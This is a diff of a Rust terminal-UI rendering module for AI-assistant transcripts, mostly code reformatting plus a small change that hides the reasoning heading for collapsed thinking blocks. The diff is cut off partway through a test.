@@ -7,10 +7,10 @@
 
 use std::collections::HashMap;
 
-use claurst_core::types::{ContentBlock, Message, Role, ToolResultContent};
 use crate::app::TurnMetadata;
 use crate::kitty_image::render_image;
 use crate::transcript_turn::reasoning_heading;
+use claurst_core::types::{ContentBlock, Message, Role, ToolResultContent};
 use ratatui::{
     style::{Color, Modifier, Style},
     text::{Line, Span},
@@ -22,8 +22,7 @@ pub use markdown::render_markdown;
 
 mod markdown_enhanced;
 pub use markdown_enhanced::{
-    detect_table, render_table, parse_inline_formatting,
-    Table, TableAlignment,
+    detect_table, parse_inline_formatting, render_table, Table, TableAlignment,
 };
 
 /// Context passed to all renderers.
@@ -221,7 +220,10 @@ fn user_metadata_line(_meta: Option<&TurnMetadata>) -> Option<Line<'static>> {
     None
 }
 
-pub fn render_transcript_assistant_meta(meta: Option<&TurnMetadata>, accent: Color) -> Option<Line<'static>> {
+pub fn render_transcript_assistant_meta(
+    meta: Option<&TurnMetadata>,
+    accent: Color,
+) -> Option<Line<'static>> {
     let meta = meta?;
 
     // Always show at least mode — matches OpenCode's "Build · Model · Duration"
@@ -235,15 +237,16 @@ pub fn render_transcript_assistant_meta(meta: Option<&TurnMetadata>, accent: Col
     let mut spans = vec![
         Span::styled(
             "   \u{25a3} ",
-            Style::default()
-                .fg(accent)
-                .add_modifier(Modifier::BOLD),
+            Style::default().fg(accent).add_modifier(Modifier::BOLD),
         ),
         Span::styled(mode, Style::default().fg(TRANSCRIPT_TEXT)),
     ];
 
     if let Some(model) = meta.model_name.as_deref().filter(|m| !m.is_empty()) {
-        spans.push(Span::styled(" \u{00b7} ", Style::default().fg(TRANSCRIPT_SUBTLE)));
+        spans.push(Span::styled(
+            " \u{00b7} ",
+            Style::default().fg(TRANSCRIPT_SUBTLE),
+        ));
         spans.push(Span::styled(
             short_model_name(model),
             Style::default().fg(TRANSCRIPT_MUTED),
@@ -251,7 +254,10 @@ pub fn render_transcript_assistant_meta(meta: Option<&TurnMetadata>, accent: Col
     }
 
     if let Some(duration) = meta.duration.as_deref().filter(|d| !d.is_empty()) {
-        spans.push(Span::styled(" \u{00b7} ", Style::default().fg(TRANSCRIPT_SUBTLE)));
+        spans.push(Span::styled(
+            " \u{00b7} ",
+            Style::default().fg(TRANSCRIPT_SUBTLE),
+        ));
         spans.push(Span::styled(
             duration.to_string(),
             Style::default().fg(TRANSCRIPT_MUTED),
@@ -259,7 +265,10 @@ pub fn render_transcript_assistant_meta(meta: Option<&TurnMetadata>, accent: Col
     }
 
     if meta.interrupted {
-        spans.push(Span::styled(" \u{00b7} ", Style::default().fg(TRANSCRIPT_SUBTLE)));
+        spans.push(Span::styled(
+            " \u{00b7} ",
+            Style::default().fg(TRANSCRIPT_SUBTLE),
+        ));
         spans.push(Span::styled(
             "interrupted",
             Style::default().fg(TRANSCRIPT_MUTED),
@@ -291,10 +300,13 @@ pub fn render_transcript_user_message(
         if buffer.is_empty() {
             return;
         }
-        target.extend(render_user_text_with_ctx(buffer, &RenderContext {
-            width: inner_width,
-            ..RenderContext::default()
-        }));
+        target.extend(render_user_text_with_ctx(
+            buffer,
+            &RenderContext {
+                width: inner_width,
+                ..RenderContext::default()
+            },
+        ));
         buffer.clear();
     };
 
@@ -314,7 +326,12 @@ pub fn render_transcript_user_message(
                     .unwrap_or_else(|| "pasted image".to_string());
                 lines.push(render_attachment_chip("img", label));
             }
-            ContentBlock::Document { title, context, source, .. } => {
+            ContentBlock::Document {
+                title,
+                context,
+                source,
+                ..
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 let label = title
                     .or(context)
@@ -335,16 +352,29 @@ pub fn render_transcript_user_message(
                 flush_text(&mut pending_text, &mut lines);
                 lines.extend(render_user_memory_input(&key, &value));
             }
-            ContentBlock::SystemAPIError { message, retry_secs } => {
+            ContentBlock::SystemAPIError {
+                message,
+                retry_secs,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 lines.extend(render_system_api_error(&message, retry_secs));
             }
-            ContentBlock::CollapsedReadSearch { tool_name, paths, n_hidden } => {
+            ContentBlock::CollapsedReadSearch {
+                tool_name,
+                paths,
+                n_hidden,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 let path_refs: Vec<&str> = paths.iter().map(|path| path.as_str()).collect();
-                lines.extend(render_collapsed_read_search(&tool_name, &path_refs, n_hidden));
+                lines.extend(render_collapsed_read_search(
+                    &tool_name, &path_refs, n_hidden,
+                ));
             }
-            ContentBlock::TaskAssignment { id, subject, description } => {
+            ContentBlock::TaskAssignment {
+                id,
+                subject,
+                description,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 lines.extend(render_task_assignment(&id, &subject, &description));
             }
@@ -352,7 +382,11 @@ pub fn render_transcript_user_message(
                 flush_text(&mut pending_text, &mut lines);
                 lines.extend(render_tool_use_inner(&name, &input));
             }
-            ContentBlock::ToolResult { tool_use_id: _, content, is_error } => {
+            ContentBlock::ToolResult {
+                tool_use_id: _,
+                content,
+                is_error,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 let text = tool_result_text(&content);
                 let rendered = if is_error.unwrap_or(false) {
@@ -364,7 +398,11 @@ pub fn render_transcript_user_message(
             }
             ContentBlock::Thinking { thinking, .. } => {
                 flush_text(&mut pending_text, &mut lines);
-                lines.extend(render_transcript_reasoning_block(&thinking, false, inner_width));
+                lines.extend(render_transcript_reasoning_block(
+                    &thinking,
+                    false,
+                    inner_width,
+                ));
             }
             ContentBlock::RedactedThinking { .. } => {
                 flush_text(&mut pending_text, &mut lines);
@@ -403,7 +441,11 @@ pub fn render_transcript_reasoning_block(
     width: u16,
 ) -> Vec<Line<'static>> {
     let mut lines = Vec::new();
-    let heading = reasoning_heading(text).unwrap_or_else(|| "Thinking".to_string());
+    let heading = if expanded {
+        reasoning_heading(text).unwrap_or_else(|| "Thinking".to_string())
+    } else {
+        String::new()
+    };
     lines.push(Line::from(vec![
         Span::styled(
             "  Thinking: ",
@@ -465,7 +507,9 @@ pub fn render_transcript_assistant_message(
                     h.finish()
                 };
                 let expanded = ctx.show_thinking || ctx.expanded_thinking.contains(&thinking_hash);
-                lines.extend(render_transcript_reasoning_block(&thinking, expanded, ctx.width));
+                lines.extend(render_transcript_reasoning_block(
+                    &thinking, expanded, ctx.width,
+                ));
             }
             ContentBlock::RedactedThinking { .. } => {
                 flush_text(&mut pending_text, &mut lines);
@@ -485,7 +529,11 @@ pub fn render_transcript_assistant_message(
                     TRANSCRIPT_TEXT,
                 ));
             }
-            ContentBlock::ToolResult { tool_use_id, content, is_error } => {
+            ContentBlock::ToolResult {
+                tool_use_id,
+                content,
+                is_error,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 let text = tool_result_text(&content);
                 let tool_name = ctx.tool_names.get(&tool_use_id).map(|name| name.as_str());
@@ -493,7 +541,9 @@ pub fn render_transcript_assistant_message(
                     render_tool_result_error(&text)
                 } else {
                     match tool_name {
-                        Some("Bash") | Some("PowerShell") => render_bash_output_block(&text, TOOL_RESULT_MAX_LINES),
+                        Some("Bash") | Some("PowerShell") => {
+                            render_bash_output_block(&text, TOOL_RESULT_MAX_LINES)
+                        }
                         Some("Read") => render_file_read_result(&text),
                         Some("Edit") => render_file_op_result(false),
                         Some("Write") => render_file_op_result(true),
@@ -522,7 +572,12 @@ pub fn render_transcript_assistant_message(
                     TRANSCRIPT_TEXT,
                 ));
             }
-            ContentBlock::Document { title, context, source, .. } => {
+            ContentBlock::Document {
+                title,
+                context,
+                source,
+                ..
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 let label = title
                     .or(context)
@@ -563,7 +618,10 @@ pub fn render_transcript_assistant_message(
                     TRANSCRIPT_TEXT,
                 ));
             }
-            ContentBlock::SystemAPIError { message, retry_secs } => {
+            ContentBlock::SystemAPIError {
+                message,
+                retry_secs,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 lines.extend(indent_lines(
                     render_system_api_error(&message, retry_secs),
@@ -572,7 +630,11 @@ pub fn render_transcript_assistant_message(
                     TRANSCRIPT_TEXT,
                 ));
             }
-            ContentBlock::CollapsedReadSearch { tool_name, paths, n_hidden } => {
+            ContentBlock::CollapsedReadSearch {
+                tool_name,
+                paths,
+                n_hidden,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 let path_refs: Vec<&str> = paths.iter().map(|path| path.as_str()).collect();
                 lines.extend(indent_lines(
@@ -582,7 +644,11 @@ pub fn render_transcript_assistant_message(
                     TRANSCRIPT_TEXT,
                 ));
             }
-            ContentBlock::TaskAssignment { id, subject, description } => {
+            ContentBlock::TaskAssignment {
+                id,
+                subject,
+                description,
+            } => {
                 flush_text(&mut pending_text, &mut lines);
                 lines.extend(indent_lines(
                     render_task_assignment(&id, &subject, &description),
@@ -635,7 +701,11 @@ pub fn extract_tool_summary(tool_name: &str, input: &serde_json::Value) -> Strin
         "websearch" => truncate(str_field(input, "query"), 60),
         "task" | "agent" => {
             let task = str_field(input, "task");
-            let task = if task.is_empty() { str_field(input, "description") } else { task };
+            let task = if task.is_empty() {
+                str_field(input, "description")
+            } else {
+                task
+            };
             truncate(task.lines().next().unwrap_or(""), 60)
         }
         _ => {
@@ -681,23 +751,27 @@ fn render_tool_use_inner(tool_name: &str, input: &serde_json::Value) -> Vec<Line
         "grep" => "Searching code",
         "webfetch" => "Fetching page",
         "websearch" => "Searching web",
-        "task" | "agent" => return {
-            let mut task_lines = Vec::new();
-            task_lines.push(Line::from(vec![
-                Span::styled("  ~ ".to_string(), Style::default().fg(CLAUDE_ORANGE)),
-                Span::styled(
-                    subagent_title(input),
-                    Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
-                ),
-            ]));
-            if !summary.is_empty() {
+        "task" | "agent" => {
+            return {
+                let mut task_lines = Vec::new();
                 task_lines.push(Line::from(vec![
-                    Span::raw("    "),
-                    Span::styled(summary, Style::default().fg(TRANSCRIPT_MUTED)),
+                    Span::styled("  ~ ".to_string(), Style::default().fg(CLAUDE_ORANGE)),
+                    Span::styled(
+                        subagent_title(input),
+                        Style::default()
+                            .fg(Color::White)
+                            .add_modifier(Modifier::BOLD),
+                    ),
                 ]));
+                if !summary.is_empty() {
+                    task_lines.push(Line::from(vec![
+                        Span::raw("    "),
+                        Span::styled(summary, Style::default().fg(TRANSCRIPT_MUTED)),
+                    ]));
+                }
+                task_lines
             }
-            task_lines
-        },
+        }
         _ => tool_name,
     };
 
@@ -705,7 +779,9 @@ fn render_tool_use_inner(tool_name: &str, input: &serde_json::Value) -> Vec<Line
         Span::styled("  ~ ".to_string(), Style::default().fg(CLAUDE_ORANGE)),
         Span::styled(
             title.to_string(),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
     ]));
     if !summary.is_empty() {
@@ -715,7 +791,10 @@ fn render_tool_use_inner(tool_name: &str, input: &serde_json::Value) -> Vec<Line
         ]));
     }
 
-    if matches!(tool_name.to_ascii_lowercase().as_str(), "bash" | "powershell") {
+    if matches!(
+        tool_name.to_ascii_lowercase().as_str(),
+        "bash" | "powershell"
+    ) {
         let command = input.get("command").and_then(|v| v.as_str()).unwrap_or("");
         for (i, cmd_line) in command.lines().enumerate() {
             if i >= 2 {
@@ -730,11 +809,15 @@ fn render_tool_use_inner(tool_name: &str, input: &serde_json::Value) -> Vec<Line
             lines.push(Line::from(vec![
                 Span::styled(
                     "    $ ".to_string(),
-                    Style::default().fg(Color::Green).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Green)
+                        .add_modifier(Modifier::BOLD),
                 ),
                 Span::styled(
                     display,
-                    Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::White)
+                        .add_modifier(Modifier::BOLD),
                 ),
             ]));
         }
@@ -783,7 +866,9 @@ pub fn render_tool_result_success(output: &str, truncated: bool) -> Vec<Line<'st
         let remaining = total_lines - TOOL_RESULT_MAX_LINES;
         lines.push(Line::from(vec![Span::styled(
             format!("  ... {} more lines", remaining),
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::DIM),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::DIM),
         )]));
     }
     if truncated {
@@ -799,10 +884,12 @@ pub fn render_tool_result_success(output: &str, truncated: bool) -> Vec<Line<'st
 pub fn render_tool_result_error(error: &str) -> Vec<Line<'static>> {
     let mut lines = Vec::new();
     // Use orange instead of red for color-blind accessibility
-    let error_color = Color::Rgb(255, 140, 0);  // Orange
+    let error_color = Color::Rgb(255, 140, 0); // Orange
     lines.push(Line::from(vec![Span::styled(
         "  Error",
-        Style::default().fg(error_color).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(error_color)
+            .add_modifier(Modifier::BOLD),
     )]));
     for line in error.lines().take(10) {
         lines.push(Line::from(vec![
@@ -840,7 +927,11 @@ pub fn render_tool_result_rejected(tool_name: &str, reason: &str) -> Vec<Line<'s
 }
 
 /// Render an attachment message (skill listing, agent listing, MCP instructions, hook results, etc.)
-pub fn render_attachment_message(kind_label: &str, content: &str, width: u16) -> Vec<Line<'static>> {
+pub fn render_attachment_message(
+    kind_label: &str,
+    content: &str,
+    width: u16,
+) -> Vec<Line<'static>> {
     // Reserve space for the "  [label] " prefix and a small margin.
     let prefix_len = kind_label.len() + 6; // "  [label] "
     let preview_max = (width as usize).saturating_sub(prefix_len).max(20).min(120);
@@ -853,20 +944,17 @@ pub fn render_attachment_message(kind_label: &str, content: &str, width: u16) ->
     vec![Line::from(vec![
         Span::styled(
             format!("  [{kind_label}] "),
-            Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Cyan)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(preview, Style::default().fg(Color::White)),
     ])]
 }
 
 /// Render an advisor status line.
-pub fn render_advisor_message(
-    is_loading: bool,
-    model_name: Option<&str>,
-) -> Vec<Line<'static>> {
-    let model_suffix = model_name
-        .map(|m| format!(" ({})", m))
-        .unwrap_or_default();
+pub fn render_advisor_message(is_loading: bool, model_name: Option<&str>) -> Vec<Line<'static>> {
+    let model_suffix = model_name.map(|m| format!(" ({})", m)).unwrap_or_default();
     if is_loading {
         vec![Line::from(vec![Span::styled(
             format!("  \u{25cc} Advising\u{2026}{}", model_suffix),
@@ -877,7 +965,9 @@ pub fn render_advisor_message(
     } else {
         vec![Line::from(vec![Span::styled(
             format!("  \u{2713} Advisor reviewed{}", model_suffix),
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::DIM),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::DIM),
         )])]
     }
 }
@@ -930,11 +1020,15 @@ pub fn render_bash_input_line(command: &str) -> Vec<Line<'static>> {
     vec![Line::from(vec![
         Span::styled(
             "  $ ".to_string(),
-            Style::default().fg(Color::Green).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Green)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             command.to_string(),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
     ])]
 }
@@ -967,14 +1061,13 @@ pub fn render_plan_steps(steps: &[String]) -> Vec<Line<'static>> {
     let mut lines = Vec::new();
     lines.push(Line::from(vec![Span::styled(
         "  Plan:".to_string(),
-        Style::default().fg(CLAUDE_ORANGE).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAUDE_ORANGE)
+            .add_modifier(Modifier::BOLD),
     )]));
     for (i, step) in steps.iter().enumerate() {
         lines.push(Line::from(vec![
-            Span::styled(
-                format!("  {}. ", i + 1),
-                Style::default().fg(CLAUDE_ORANGE),
-            ),
+            Span::styled(format!("  {}. ", i + 1), Style::default().fg(CLAUDE_ORANGE)),
             Span::styled(step.clone(), Style::default().fg(Color::White)),
         ]));
     }
@@ -986,7 +1079,9 @@ pub fn render_plan_approval_prompt() -> Vec<Line<'static>> {
     vec![Line::from(vec![
         Span::styled(
             "  Approve this plan? ".to_string(),
-            Style::default().fg(CLAUDE_ORANGE).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAUDE_ORANGE)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             "[y] yes  [n] no  [e] edit".to_string(),
@@ -999,7 +1094,9 @@ pub fn render_plan_approval_prompt() -> Vec<Line<'static>> {
 pub fn render_compact_boundary() -> Vec<Line<'static>> {
     vec![Line::from(vec![Span::styled(
         "----------- context compacted -----------",
-        Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(Color::DarkGray)
+            .add_modifier(Modifier::ITALIC),
     )])]
 }
 
@@ -1008,7 +1105,9 @@ pub fn render_summary_message(text: &str) -> Vec<Line<'static>> {
     let mut lines = Vec::new();
     lines.push(Line::from(vec![Span::styled(
         "Summary",
-        Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(Color::Cyan)
+            .add_modifier(Modifier::BOLD),
     )]));
     for line in text.lines() {
         lines.push(Line::from(vec![
@@ -1022,7 +1121,11 @@ pub fn render_summary_message(text: &str) -> Vec<Line<'static>> {
 /// Render an unseen divider.
 pub fn render_unseen_divider(count: usize) -> Vec<Line<'static>> {
     vec![Line::from(vec![Span::styled(
-        format!("---- {} new message{} ----", count, if count == 1 { "" } else { "s" }),
+        format!(
+            "---- {} new message{} ----",
+            count,
+            if count == 1 { "" } else { "s" }
+        ),
         Style::default().fg(Color::Yellow),
     )])]
 }
@@ -1044,15 +1147,23 @@ pub fn render_system_message(text: &str) -> Vec<Line<'static>> {
 /// Render a thinking block (collapsible - show header only when collapsed).
 pub fn render_thinking_block(text: &str, expanded: bool) -> Vec<Line<'static>> {
     let mut lines = Vec::new();
-    let heading = reasoning_heading(text).unwrap_or_else(|| "Thinking".to_string());
+    let heading = if expanded {
+        reasoning_heading(text).unwrap_or_else(|| "Thinking".to_string())
+    } else {
+        String::new()
+    };
     lines.push(Line::from(vec![
         Span::styled(
             "Thinking: ",
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::ITALIC),
         ),
         Span::styled(
             heading,
-            Style::default().fg(Color::Gray).add_modifier(Modifier::ITALIC),
+            Style::default()
+                .fg(Color::Gray)
+                .add_modifier(Modifier::ITALIC),
         ),
     ]));
     if expanded {
@@ -1072,11 +1183,16 @@ pub fn render_rate_limit_banner(retry_after_secs: u64) -> Vec<Line<'static>> {
 }
 
 /// Render a rate-limit warning banner with optional upgrade hint.
-pub fn render_rate_limit_with_hint(retry_after_secs: u64, show_upgrade_hint: bool) -> Vec<Line<'static>> {
+pub fn render_rate_limit_with_hint(
+    retry_after_secs: u64,
+    show_upgrade_hint: bool,
+) -> Vec<Line<'static>> {
     let mut lines = vec![
         Line::from(vec![Span::styled(
             "Rate limit exceeded",
-            Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Yellow)
+                .add_modifier(Modifier::BOLD),
         )]),
         Line::from(vec![Span::styled(
             format!("  Retrying in {}s...", retry_after_secs),
@@ -1143,11 +1259,7 @@ fn prefix_message_lines(
                 .add_modifier(Modifier::BOLD),
             Style::default().fg(Color::White),
         ),
-        Role::Assistant => (
-            "",
-            Style::default(),
-            Style::default().fg(Color::White),
-        ),
+        Role::Assistant => ("", Style::default(), Style::default().fg(Color::White)),
     };
 
     if !prefix.is_empty() {
@@ -1223,7 +1335,9 @@ fn render_attachment_line(kind: &str, label: String) -> Vec<Line<'static>> {
     vec![Line::from(vec![
         Span::styled(
             format!("  {} ", kind),
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(label, Style::default().fg(Color::DarkGray)),
     ])]
@@ -1278,7 +1392,11 @@ pub fn render_message(msg: &Message, ctx: &RenderContext) -> Vec<Line<'static>> 
                 let _ = &id;
                 lines.extend(prefix_message_lines(rendered, &msg.role, ctx.width));
             }
-            ContentBlock::ToolResult { tool_use_id, content, is_error } => {
+            ContentBlock::ToolResult {
+                tool_use_id,
+                content,
+                is_error,
+            } => {
                 flush_text(&mut lines, &msg.role, &mut pending_text, ctx);
                 let text = tool_result_text(&content);
                 let tool_name = ctx.tool_names.get(&tool_use_id).map(|s| s.as_str());
@@ -1313,7 +1431,12 @@ pub fn render_message(msg: &Message, ctx: &RenderContext) -> Vec<Line<'static>> 
                     ));
                 }
             }
-            ContentBlock::Document { title, context, source, .. } => {
+            ContentBlock::Document {
+                title,
+                context,
+                source,
+                ..
+            } => {
                 flush_text(&mut lines, &msg.role, &mut pending_text, ctx);
                 let label = title
                     .or(context)
@@ -1338,16 +1461,29 @@ pub fn render_message(msg: &Message, ctx: &RenderContext) -> Vec<Line<'static>> 
                 flush_text(&mut lines, &msg.role, &mut pending_text, ctx);
                 lines.extend(render_user_memory_input(&key, &value));
             }
-            ContentBlock::SystemAPIError { message, retry_secs } => {
+            ContentBlock::SystemAPIError {
+                message,
+                retry_secs,
+            } => {
                 flush_text(&mut lines, &msg.role, &mut pending_text, ctx);
                 lines.extend(render_system_api_error(&message, retry_secs));
             }
-            ContentBlock::CollapsedReadSearch { tool_name, paths, n_hidden } => {
+            ContentBlock::CollapsedReadSearch {
+                tool_name,
+                paths,
+                n_hidden,
+            } => {
                 flush_text(&mut lines, &msg.role, &mut pending_text, ctx);
                 let path_refs: Vec<&str> = paths.iter().map(|s| s.as_str()).collect();
-                lines.extend(render_collapsed_read_search(&tool_name, &path_refs, n_hidden));
+                lines.extend(render_collapsed_read_search(
+                    &tool_name, &path_refs, n_hidden,
+                ));
             }
-            ContentBlock::TaskAssignment { id, subject, description } => {
+            ContentBlock::TaskAssignment {
+                id,
+                subject,
+                description,
+            } => {
                 flush_text(&mut lines, &msg.role, &mut pending_text, ctx);
                 lines.extend(render_task_assignment(&id, &subject, &description));
             }
@@ -1400,11 +1536,15 @@ pub fn render_user_command(name: &str, args: &str) -> Vec<Line<'static>> {
     vec![Line::from(vec![
         Span::styled(
             "\u{25b8} ",
-            Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Cyan)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             name.to_string(),
-            Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Cyan)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(" ".to_string(), Style::default()),
         Span::styled(args.to_string(), Style::default().fg(Color::White)),
@@ -1439,7 +1579,9 @@ pub fn render_user_local_command_output(
     let mut lines = Vec::new();
     lines.push(Line::from(vec![Span::styled(
         format!("  !{}", command),
-        Style::default().fg(Color::DarkGray).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(Color::DarkGray)
+            .add_modifier(Modifier::BOLD),
     )]));
     let total = output.lines().count();
     for line in output.lines().take(max_lines) {
@@ -1464,7 +1606,9 @@ pub fn render_resource_update(server: &str, uri: &str, reason: &str) -> Vec<Line
         Span::styled("\u{21bb} ", Style::default().fg(Color::Cyan)),
         Span::styled(
             format!("{}: ", server),
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(uri.to_string(), Style::default().fg(Color::White)),
         Span::styled(
@@ -1484,13 +1628,12 @@ pub fn render_collapsed_read_search(
 ) -> Vec<Line<'static>> {
     let paths_str = paths.join(", ");
     let mut spans = vec![
-        Span::styled(
-            "\u{25b8} ",
-            Style::default().fg(Color::Yellow),
-        ),
+        Span::styled("\u{25b8} ", Style::default().fg(Color::Yellow)),
         Span::styled(
             format!("{} ", tool_name),
-            Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Yellow)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(paths_str, Style::default().fg(Color::White)),
     ];
@@ -1515,7 +1658,9 @@ pub fn render_task_assignment(id: &str, subject: &str, desc: &str) -> Vec<Line<'
         Span::styled("  ~ ", Style::default().fg(CLAUDE_ORANGE)),
         Span::styled(
             title.to_string(),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!(" · task #{}", id),
@@ -1525,10 +1670,7 @@ pub fn render_task_assignment(id: &str, subject: &str, desc: &str) -> Vec<Line<'
     for line in desc.lines().take(5) {
         lines.push(Line::from(vec![
             Span::raw("    "),
-            Span::styled(
-                line.to_string(),
-                Style::default().fg(TRANSCRIPT_MUTED),
-            ),
+            Span::styled(line.to_string(), Style::default().fg(TRANSCRIPT_MUTED)),
         ]));
     }
     lines
@@ -1543,11 +1685,15 @@ pub fn render_grouped_tool_use(names: &[&str], expanded: bool) -> Vec<Line<'stat
     let header = Line::from(vec![
         Span::styled(
             "\u{25b8} ",
-            Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Yellow)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("{} tool call{}", n, if n == 1 { "" } else { "s" }),
-            Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::Yellow)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("  {}", preview),
@@ -1572,7 +1718,10 @@ mod tests {
     use super::*;
 
     fn line_text(line: &Line<'_>) -> String {
-        line.spans.iter().map(|s| s.content.to_string()).collect::<String>()
+        line.spans
+            .iter()
+            .map(|s| s.content.to_string())
+            .collect::<String>()
     }
 
     #[test]
@@ -1669,7 +1818,8 @@ mod tests {
 
     #[test]
     fn test_render_attachment_message() {
-        let result = render_attachment_message("skill_listing", "5 tools available: Bash, Read", 80);
+        let result =
+            render_attachment_message("skill_listing", "5 tools available: Bash, Read", 80);
         assert!(!result.is_empty());
         let text = line_text(&result[0]);
         assert!(text.contains("skill_listing"));
@@ -1682,7 +1832,10 @@ mod tests {
         let result = render_attachment_message("kind", &long, 80);
         assert!(!result.is_empty());
         let text = line_text(&result[0]);
-        assert!(text.contains('\u{2026}') || text.len() < long.len(), "expected truncation");
+        assert!(
+            text.contains('\u{2026}') || text.len() < long.len(),
+            "expected truncation"
+        );
     }
 
     #[test]
@@ -1715,7 +1868,11 @@ mod tests {
     fn test_render_shutdown_message() {
         let result = render_shutdown_message("max turns reached");
         assert!(!result.is_empty());
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         assert!(combined.contains("Session ended"));
         assert!(combined.contains("max turns reached"));
     }
@@ -1731,7 +1888,10 @@ mod tests {
 
     #[test]
     fn test_render_bash_output_block() {
-        let output = (0..50).map(|i| format!("line {}", i)).collect::<Vec<_>>().join("\n");
+        let output = (0..50)
+            .map(|i| format!("line {}", i))
+            .collect::<Vec<_>>()
+            .join("\n");
         let result = render_bash_output_block(&output, 10);
         assert!(!result.is_empty());
         // 10 content lines + 1 overflow indicator
@@ -1752,7 +1912,11 @@ mod tests {
         let steps = vec!["First step".to_string(), "Second step".to_string()];
         let result = render_plan_steps(&steps);
         assert!(!result.is_empty());
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         assert!(combined.contains("Plan:"));
         assert!(combined.contains("1."));
         assert!(combined.contains("First step"));
@@ -1773,7 +1937,10 @@ mod tests {
 
     #[test]
     fn test_render_tool_result_success_uses_30_lines() {
-        let output = (0..50).map(|i| format!("line {}", i)).collect::<Vec<_>>().join("\n");
+        let output = (0..50)
+            .map(|i| format!("line {}", i))
+            .collect::<Vec<_>>()
+            .join("\n");
         let result = render_tool_result_success(&output, false);
         // 30 content lines + 1 overflow indicator = 31 (no separate header line)
         assert_eq!(result.len(), 31);
@@ -1794,9 +1961,18 @@ mod tests {
             .map(|l| line_text(&l))
             .collect::<Vec<_>>()
             .join("\n");
-        assert!(rendered.contains("ls -la"), "command should appear in output");
-        assert!(rendered.contains("Running command"), "updated tool title should appear");
-        assert!(!rendered.contains("ctrl+o"), "legacy expansion hint should be removed");
+        assert!(
+            rendered.contains("ls -la"),
+            "command should appear in output"
+        );
+        assert!(
+            rendered.contains("Running command"),
+            "updated tool title should appear"
+        );
+        assert!(
+            !rendered.contains("ctrl+o"),
+            "legacy expansion hint should be removed"
+        );
     }
 
     #[test]
@@ -1811,9 +1987,18 @@ mod tests {
             .map(|l| line_text(&l))
             .collect::<Vec<_>>()
             .join("\n");
-        assert!(rendered.contains("Reading file"), "tool title should appear");
-        assert!(rendered.contains("foo.txt"), "file path summary should appear");
-        assert!(!rendered.contains("ctrl+o"), "legacy expansion hint should be removed");
+        assert!(
+            rendered.contains("Reading file"),
+            "tool title should appear"
+        );
+        assert!(
+            rendered.contains("foo.txt"),
+            "file path summary should appear"
+        );
+        assert!(
+            !rendered.contains("ctrl+o"),
+            "legacy expansion hint should be removed"
+        );
     }
 
     #[test]
@@ -1839,7 +2024,10 @@ mod tests {
     fn bash_tool_result_renders_as_bash_output_with_tool_names_context() {
         let mut tool_names = HashMap::new();
         tool_names.insert("tu-bash-1".to_string(), "Bash".to_string());
-        let ctx = RenderContext { tool_names, ..Default::default() };
+        let ctx = RenderContext {
+            tool_names,
